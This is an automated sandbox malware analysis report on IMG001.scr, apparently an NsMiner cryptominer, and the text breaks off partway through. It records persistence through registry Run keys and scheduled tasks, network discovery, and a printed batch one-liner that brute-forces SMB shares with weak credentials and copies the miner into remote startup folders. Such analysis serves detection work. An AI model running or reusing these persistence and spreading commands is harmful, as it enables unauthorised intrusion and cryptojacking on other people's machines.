Malware Analysis Report

2025-03-15 05:55

Sample ID 240514-lwwk7aah8y
Target IMG001.scr
SHA256 d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
Tags
vmprotect persistence discovery
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c

Threat Level: Known bad

The file IMG001.scr was found to be: Known bad.

Malicious Activity Summary

vmprotect persistence discovery

Contacts a large (1048) amount of remote hosts

VMProtect packed file

Loads dropped DLL

Executes dropped EXE

Drops startup file

Adds Run key to start application

Enumerates connected drives

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

NSIS installer

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Discovers systems in the same network

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-14 09:53

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

146s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\lzma.exe"

Signatures

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\lzma.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\lzma.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1832 -ip 1832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 812

Network

Country Destination Domain Proto
US 52.111.229.19:443 tcp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

90s

Max time network

92s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\zlib.exe"

Signatures

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\zlib.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\zlib.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 752 -ip 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 844

Network

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

91s

Max time network

105s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\makensis.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\makensis.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\makensis.exe"

Network

Country Destination Domain Proto
US 52.111.227.11:443 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

143s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" C:\Windows\SysWOW64\reg.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\UAC.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\net.exe N/A
N/A N/A C:\Windows\SysWOW64\net.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1916 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IMG001.scr C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
PID 1916 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IMG001.scr C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
PID 1916 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IMG001.scr C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
PID 2632 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 1588 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1588 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1588 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 5020 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 5020 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 2120 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2120 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2120 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4976 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4976 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4976 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5020 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 5020 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 5020 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 5020 wrote to memory of 3744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 5020 wrote to memory of 3744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 5020 wrote to memory of 3744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 2632 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1908 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1908 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1908 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1908 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1908 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1908 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1908 wrote to memory of 4900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ARP.EXE
PID 1908 wrote to memory of 4900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ARP.EXE
PID 1908 wrote to memory of 4900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ARP.EXE
PID 1908 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1908 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1908 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 4160 wrote to memory of 764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2200 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2200 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2200 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2200 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 2200 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 2200 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe

Processes

C:\Users\Admin\AppData\Local\Temp\IMG001.scr

"C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe

"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -standby-timeout-ac 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -hibernate-timeout-ac 0

C:\Windows\SysWOW64\powercfg.exe

Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0102& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"

C:\Windows\SysWOW64\net.exe

net view

C:\Windows\SysWOW64\find.exe

find /i "\\"

C:\Windows\SysWOW64\ARP.EXE

arp -a

C:\Windows\SysWOW64\find.exe

find /i " 1"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c set str_

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "

C:\Windows\SysWOW64\net.exe

net view \\10.127.0.1

C:\Windows\SysWOW64\find.exe

find /i " "

Network

Country Destination Domain Proto
US 8.8.8.8:53 stafftest.ru udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:443 udp
N/A 10.127.0.1:139 tcp

Files

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe

MD5 fbbcf1e9501234d6661a0c9ae6dc01c9
SHA1 1ca9759a324159f331e79ea6871ad62040521b41
SHA256 d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512 027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140

C:\Users\Admin\AppData\Local\Temp\nsy661A.tmp\inetc.dll

MD5 d7a3fa6a6c738b4a3c40d5602af20b08
SHA1 34fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA256 67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA512 75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

146s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\ExecDos.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 224 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 224 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 224 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\ExecDos.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\ExecDos.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2532 -ip 2532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 448

Network

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

91s

Max time network

101s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner64.exe"

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner64.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner64.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner64.exe"

Network

Country Destination Domain Proto
US 52.111.229.48:443 tcp

Files

memory/1772-0-0x00007FF6DC2F0000-0x00007FF6DC69D000-memory.dmp

memory/1772-1-0x00007FF6DC2F0000-0x00007FF6DC69D000-memory.dmp

memory/1772-5-0x00007FF6DC2F0000-0x00007FF6DC69D000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

146s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2.exe"

Signatures

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5036 -ip 5036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 844

Network

Country Destination Domain Proto
US 52.111.227.11:443 tcp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

147s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2_solid.exe"

Signatures

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2_solid.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2_solid.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3760 -ip 3760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 812

Network

Country Destination Domain Proto
NL 52.111.243.30:443 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

146s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\inetc.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5072 wrote to memory of 132 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5072 wrote to memory of 132 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5072 wrote to memory of 132 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\inetc.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\inetc.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 132 -ip 132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 480

Network

Country Destination Domain Proto
US 52.111.227.11:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

146s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner32.exe"

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner32.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner32.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/3860-0-0x0000000000F10000-0x0000000001259000-memory.dmp

memory/3860-1-0x0000000000F10000-0x0000000001259000-memory.dmp

memory/3860-4-0x0000000000F10000-0x0000000001259000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

146s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\ExecDos.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2664 wrote to memory of 3240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 3240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2664 wrote to memory of 3240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\ExecDos.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\ExecDos.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3240 -ip 3240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 448

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

